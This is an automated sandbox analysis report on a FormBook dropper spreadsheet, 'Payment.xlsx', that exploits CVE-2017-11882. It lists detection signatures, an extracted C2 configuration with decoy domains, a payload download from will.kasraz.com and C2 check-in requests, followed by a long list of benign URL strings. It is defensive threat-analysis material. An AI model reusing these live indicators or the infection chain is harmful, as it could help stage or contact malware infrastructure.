Analysis Report Payment.xlsx

Overview

General Information

Sample Name: Payment.xlsx
Analysis ID: 404048
MD5: 05f49aa5b342dedd1d7b6673f3d8bc41
SHA1: 9ca061b9851269f8b1d2fd990ebe119903a5f0fb
SHA256: 3a6cc669542f5e3f9a801e9344b182c71e72396e27afbeac14eeb3d3be0b9498
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.cats16.com/8u3b/"], "decoy": ["pipienta.com", "wisdomfest.net", "jenniferreich.com", "bigcanoehomesforless.com", "kayandbernard.com", "offerbuildingsecrets.com", "benleefoto.com", "contactlesssoftware.tech", "statenislandplumbing.info", "lifestylemedicineservices.com", "blazerplanning.com", "fnatic-skins.club", "effectivemarketinginc.com", "babyshopit.com", "2000deal.com", "k12paymentcemter.com", "spwakd.com", "lesreponses.com", "abundando.com", "hawkspremierfhc.com", "midwestmadeclothing.com", "kamuakuinisiapa.com", "swirlingheadjewelry.com", "donelys.com", "stiloksero.com", "hoangphucsolar.com", "gb-contracting.com", "girlboyfriends.com", "decadejam.com", "glassfullcoffee.com", "todoparaconstruccion.com", "anygivenrunday.com", "newgalaxyindia.com", "dahlonegaforless.com", "blue-light.tech", "web-evo.com", "armmotive.com", "mollysmulligan.com", "penislandbrewer.com", "wgrimao.com", "dxm-int.net", "sarmaayagroup.com", "timbraunmusician.com", "amazoncovid19tracer.com", "peaknband.com", "pyqxlz.com", "palomachurch.com", "surfboardwarehouse.net", "burundiacademyst.com", "pltcoin.com", "workinglifestyle.com", "vickybowskill.com", "ottawahomevalues.info", "jtrainterrain.com", "francescoiocca.com", "metallitypiercing.com", "lashsavings.com", "discjockeydelraybeach.com", "indicraftsvilla.com", "tbq.xyz", "arfjkacsgatfzbazpdth.com", "appsend.online", "cunerier.com", "orospucocuguatmaca.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe ReversingLabs: Detection: 12%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 12%
Multi AV Scanner detection for submitted file
Source: Payment.xlsx Virustotal: Detection: 18%
Source: Payment.xlsx ReversingLabs: Detection: 10%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 7.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp

Software Vulnerabilities:

Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0039A860
Source: C:\Users\Public\vbc.exe Code function: 4x nop then lea esp, dword ptr [ebp-08h] 4_2_0039A851
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047346A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473478
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047331A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_0047352A
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473328
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00473538
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004731D8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004731E8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004735E8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_004735F8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 7_2_0040C368
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop esi 7_2_004157FE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop edi 9_2_0008C368
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 4x nop then pop esi 9_2_000957FE
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: will.kasraz.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.122.177:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 3132 WEB-CLIENT PNG large image width download attempt 192.3.122.177:80 -> 192.168.2.22:49167
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49173 -> 66.235.200.147:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.cats16.com/8u3b/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 May 2021 14:58:50 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Tue, 04 May 2021 10:00:54 GMTETag: "a2800-5c17e27600d6b"Accept-Ranges: bytesContent-Length: 665600Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg== HTTP/1.1Host: www.donelys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=s5u5WNMtaTRlz52z/4dgKpDJSj+CyHwo8kTb9wzTosdJqxcIJBsW60lsAC1MLSgGQxuvcQ==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.discjockeydelraybeach.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=PWNBDH2kPFbxu8wMq8B+54WayNfcYj50QVExyBnwJwJD4MXsJiLDRtZ2aZJG8kcSD/SQ2A== HTTP/1.1Host: www.arfjkacsgatfzbazpdth.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.girlboyfriends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1Host: www.burundiacademyst.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1Host: www.pipienta.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.54.117.210
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: INTERQGMOInternetIncJP
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /a/so.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: will.kasraz.comConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7F90404A.emf
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: will.kasraz.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 04 May 2021 15:00:21 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeSet-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=LaxCF-Cache-Status: MISScf-request-id: 09d97e072e00004e44b212b000000001Server: cloudflareCF-RAY: 64a2991eb90d4e44-FRA Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: vbc.exe, 00000004.00000002.2171469708.0000000002281000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
